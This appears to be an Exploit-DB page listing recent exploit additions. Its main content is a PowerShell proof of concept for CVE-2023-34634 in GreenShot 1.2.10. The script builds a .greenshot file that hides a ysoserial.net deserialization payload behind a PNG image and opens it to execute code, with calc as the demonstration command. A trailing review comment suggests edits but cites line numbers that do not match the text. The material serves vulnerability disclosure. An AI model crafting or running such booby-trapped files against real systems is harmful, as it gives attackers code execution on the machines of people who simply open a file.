
22 changes to exploits/shellcodes/ghdb Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities Joomla HikaShop 4.7.4 - Reflected XSS Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS mooDating 1.2 - Reflected Cross-site scripting (XSS) October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated) PaulPrinting CMS - (Search Delivery) Cross Site Scripting Perch v3.2 - Persistent Cross Site Scripting (XSS) RosarioSIS 10.8.4 - CSV Injection WordPress Plugin AN_Gradebook 5.0.1 - SQLi Zomplog 3.9 - Cross-site scripting (XSS) zomplog 3.9 - Remote Code Execution (RCE) copyparty 1.8.2 - Directory Traversal copyparty v1.8.6 - Reflected Cross Site Scripting (XSS) GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
42 lines
No EOL
2.1 KiB
PowerShell
# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
|
|
# Date: 26/07/2023
|
|
# Exploit Author: p4r4bellum
|
|
# Vendor Homepage: https://getgreenshot.org
|
|
# Software Link: https://getgreenshot.org/downloads/
|
|
# Version: 1.2.6.10
|
|
# Tested on: windows 10.0.19045 N/A build 19045
|
|
# CVE : CVE-2023-34634
|
|
#
|
|
# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
|
|
# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software
|
|
# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file
|
|
# will lead to arbitrary code execution
|
|
#
|
|
# Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
|
|
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw
|
|
#load the payload
|
|
$payload = Get-Content .\payload.bin -Encoding Byte
|
|
# retrieve the length of the payload
|
|
$length = $payload.Length
|
|
# load the required assembly to craft a PNG file
|
|
Add-Type -AssemblyName System.Drawing
|
|
# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
|
|
$filename = "$home\poc.greenshot"
|
|
$bmp = new-object System.Drawing.Bitmap 250,61
|
|
$font = new-object System.Drawing.Font Consolas,24
|
|
$brushBg = [System.Drawing.Brushes]::Green
|
|
$brushFg = [System.Drawing.Brushes]::Black
|
|
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
|
|
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
|
|
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)
|
|
$graphics.Dispose()
|
|
$bmp.Save($filename)
|
|
|
|
# append the payload to the PNG file
|
|
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline
|
|
# append the length of the payload
|
|
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline
|
|
# append the signature
|
|
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
|
|
# launch greenshot. Calc.exe should be executed
|
|
Invoke-Item $filename |
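Review bot: The header's version metadata is inconsistent: the title on line 11 and the description on line 38 say `1.2.10` (and below), while `# Version: 1.2.6.10` on line 26 names a different build, so a reader cannot tell which release the PoC was actually run against; pick one and, if the fixed release is known, add it as `# Fixed in: [fixed version]`. The prose on lines 41 and 44 also has typos (`inscureley`, `programm`, `a*.greenshot`) that the same header cleanup should catch. Lines 115–127 construct the trailer the parser reads, but no comment states the overall file layout; a single line such as `# .greenshot layout: PNG image, then serialized payload, then 8-byte length from BitConverter, then ASCII signature "Greenshot01.02"` placed before line 115 would make the three Add-Content calls self-explanatory and gives responders the exact structure to check for when triaging suspicious .greenshot files.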